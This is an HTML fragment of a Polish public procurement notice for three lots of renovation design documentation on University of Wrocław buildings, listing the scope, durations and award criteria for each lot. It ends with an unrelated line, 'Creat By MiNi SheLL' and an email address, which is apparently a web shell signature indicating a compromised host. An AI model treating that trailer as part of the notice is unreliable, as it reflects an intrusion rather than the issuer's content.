<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Wykonanie dokumentacji projektowo-kosztorysowej na remont pomieszczeń piwnicznych budynku Uniwersytetu Wrocławskiego przy ul. Krętej 1 we Wrocławiu (wymiana zawilgoconych i odparzonych tynków, wykonanie izolacji przeciwwilgociowej ścian fundamentowych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1:
Wykonanie dokumentacji projektowo-kosztorysowej na remont pomieszczeń piwnicznych budynku Uniwersytetu Wrocławskiego przy ul. Krętej 1 we Wrocławiu (wymiana zawilgoconych i odparzonych tynków, wykonanie izolacji przeciwwilgociowej ścian fundamentowych).
W ramach zamówienia należy:
a)	Zinwentaryzować piwnice i parter
b)	Zlecić opinię kominiarską celem określenia drożności kanałów wentylacyjnych
c)	Dostosować piwnicę i parter do wszystkich uwag zawartych w ekspertyzie mykologiczno - budowlanej z marca 2015r. wykonanej przez mgr inż. Jana Kunerta 
d)	Uzyskać uzgodnienie z rzeczoznawcą ds. ppoż. i sanepidu
e)	Uzyskać pozwolenie na budowę
2.	Szczegółowy zakres wykonania zadania zawierają następujące dokumenty:
a)	Opis przedmiotu zamówienia dla Zadania 1 - Załączniki nr 2.1 do SIWZ
b)	Wzór umowy dla Zadania 1 - załączniki nr 9.1 do SIWZ
c)	Rysunki stanu technicznego obiektów dla zadania 1 - załącznik nr 10
d)	Ekspertyza mykologiczno-budowlana dla zadania 1 - załącznik nr 11.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Wykonanie dokumentacji projektowo-kosztorysowej na remont elewacji oraz piwnic w celu usunięcia zawilgocenia w budynku Uniwersytetu Wrocławskiego przy ul. Szewskiej 48 we Wrocławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2:
Wykonanie dokumentacji projektowo-kosztorysowej na remont elewacji oraz piwnic w celu usunięcia zawilgocenia w budynku Uniwersytetu Wrocławskiego przy ul. Szewskiej 48 we Wrocławiu.
W ramach zamówienia należy:
a)	Uściślić inwentaryzację 
b)	Wykonać ekspertyzę mykologiczno-budowlaną dla piwnic 
c)	Wymienić lub przewidzieć renowację stolarki okiennej i drzwiowej zewnętrznej w całym budynku wraz z obróbkami wewnętrznymi i zewnętrznymi oraz w razie potrzeby podokienników wewnętrznych i zewnętrznych; zastosować  nawietrzaki w oknach. Wymianę okien powiązać z dostosowaniem budynku do aktualnych przepisów ppoż. (instalacja oddymiająca okien). 
d)	Wyremontować ściany osłonowe zewnętrzne i od strony dziedzińca - ze względu na zły stan tynków; wykonać nowe tynki. Zastosować farby antygraffiti.
e)	Odtworzyć detale dekoracyjne na elewacjach jak opaski, obdasznice okien, balustradę balkonową, gzymsy boniowane, portal, opaski okienne itp.
f)	Poddać renowacji zabytkowe kraty
g)	Wymienić obróbki blacharskie w tym rynny, rury spustowe, daszki i opierzenia.
h)	Zdemontować i powtórnie zamontować instalację odgromową, anteny i lampy oświetlenia ulicznego.
i)	W piwnicach należy: skuć stare tynki i zastąpić je tynkami renowacyjnymi, wypoziomować posadzkę w jednej z piwnic od ul. Szewskiej, przewidzieć izolację przeciwwilgociową pionową i poziomą, przewidzieć wymianę warstw posadzek piwnicznych i rozwiązanie problemu podmakania w piwnicach. Piwnice odgrzybić. Na podłogach w piwnicy położyć płytki gresowe. 
j)	Sprawdzić stan podejść i w zależności od ich stanu dokonać Ew. wymiany
k)	Przebudować studzienki okienne okien piwnicznych w taki sposób, żeby uniemożliwić przedostawanie się wód opadowych do wnętrza pomieszczeń piwnicznych 
l)	Dostosować piwnicę do wszystkich uwag zawartych w ekspertyzie mykologiczno - budowlanej.
m)	Z dokumentacji wykonanej w 2008 roku dotyczącej wentylacji i klimatyzacji w budynku wykonanej przez Pana Ryszarda Dąbrowskiego z firmy DORBUD  wybrać  część odnoszącą się do wentylacji piwnic. Uaktualnić kosztorys dla tej części dokumentacji. Przewidzieć demontaż starych nieużywanych kanałów wentylacyjnych znajdujących się aktualnie w piwnicach.
n)	W kosztorysach przewidzieć etapowanie inwestycji na elewację, okna i piwnicę.
2. Szczegółowy zakres wykonania zadania zawierają następujące dokumenty:
a)	Opis przedmiotu zamówienia dla Zadania 2 - Załączniki nr 2.2 do SIWZ
b)	Wzór umowy dla Zadania 2 - załączniki nr 9.2 do SIWZ
c)	Rysunki stanu technicznego obiektów dla zadań 2 - załącznik nr 10
d)	Plan sytuacyjny dla zadania 2 - załącznik nr 12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Wykonanie dokumentacji projektowo - kosztorysowej na remont dachu, elewacji i wymiany stolarki okiennej w budynku Uniwersytetu Wrocławskiego przy ul. Przybyszewskiego 63/77 we Wrocławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wykonanie dokumentacji projektowo - kosztorysowej na remont dachu, elewacji i wymiany stolarki okiennej w budynku Uniwersytetu Wrocławskiego przy ul. Przybyszewskiego 63/77 we Wrocławiu.
W ramach zamówienia należy:
a)	Uściślić inwentaryzację elewacji, okien, dachu i więźby dachowej
b)	Wykonać ekspertyzę kominiarską
c)	Wyremontować dach, kominy. uszkodzone kominki wentylacyjne i wywiewki instalacji kanalizacyjnej. Usunąć nieczynne kominki wentylacyjne. Dachówki ceramiczne, nowa papa na stropodachach. 
d)	Zdemontować stare lukarny na dachu i wykonać nowe. 
e)	Sprawdzić więźbę i ewentualnie uzupełnić łaty. Całość zaimpregnować ppoż. Wymienić uszkodzone deski podłogowe na strychu.
f)	Wymienić i zabezpieczyć ocieplenie nad starą aulą.
g)	Zdemontować stare rury na strychu i dachu
h)	W pomieszczeniach 311 i 316 sprawdzić możliwość wykorzystania w przyszłości istniejącego kanału wentylacji grawitacyjnej do podłączenia wyciągu z digestorium chemicznego. W razie braku takiej możliwości zaprojektować rury wyciągowe wyprowadzone ponad dach.
i)	Wyremontować balkony, schody zewnętrzne
j)	Wyremontować barierki i murki przy zejściach do piwnicy oraz barierki tarasów i balkonów. Całość ujednolicić.
k)	Wyremontować daszki dobudowane do budynku
l)	Wymienić lub przewidzieć renowację stolarki okiennej (w tym liczne okna nietypowe) i drzwiowej wraz z obróbkami wewnętrznymi i zewnętrznymi oraz w razie potrzeby podokienników wewnętrznych i zewnętrznych; zastosować  przewietrzaki w oknach. Wymianę okien powiązać z dostosowania budynku do aktualnych przepisów ppoż. (instalacja oddymiająca okien). Część okien już została wymieniona. Wymianę okien w sali wspinaczkowej uzgodnić z aktualnym użytkownikiem sali.
m)	Okna w piwnicach i na parterze zaopatrzyć w ujednolicone kraty
n)	Wyremontować ściany osłonowe zewnętrzne ze względu na zły stan tynków Wykonać nowe tynki i pomalować je farbami antygraffiti. Odnoga północna (tzw. budynek Arcusa) posiada już nowe tynki.
o)	Wymienić obróbki blacharskie w tym rynny i rury spustowe, obróbki przy kominach i na dachach.
p)	Uzupełnić opaski betonowe i żwirowe wokół budynku
q)	Przewidzieć demontaż i powtórny montaż instalacji odgromowej (lub zaprojektować nową) oraz telewizji dozorowej, rusztowań dla winorośli, klimatyzacji w oknach i na elewacji
r)	Pochować kable biegnące po elewacji
s)	Zabezpieczyć elewacje przed ptakami
t)	Przewidzieć etapowanie kosztorysów na dach, elewację i stolarkę
2.	Szczegółowy zakres wykonania zadania zawierają następujące dokumenty:
a)	Opis przedmiotu zamówienia dla Zadania 3 - Załączniki nr 2.3 do SIWZ
b)	Wzór umowy dla Zadania 3 - załączniki nr 9.3 do SIWZ
c)	Rysunki stanu technicznego obiektów dla zadań 3 - załącznik nr 10
d)	Plan sytuacyjny dla zadania 3 - załącznik nr 13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com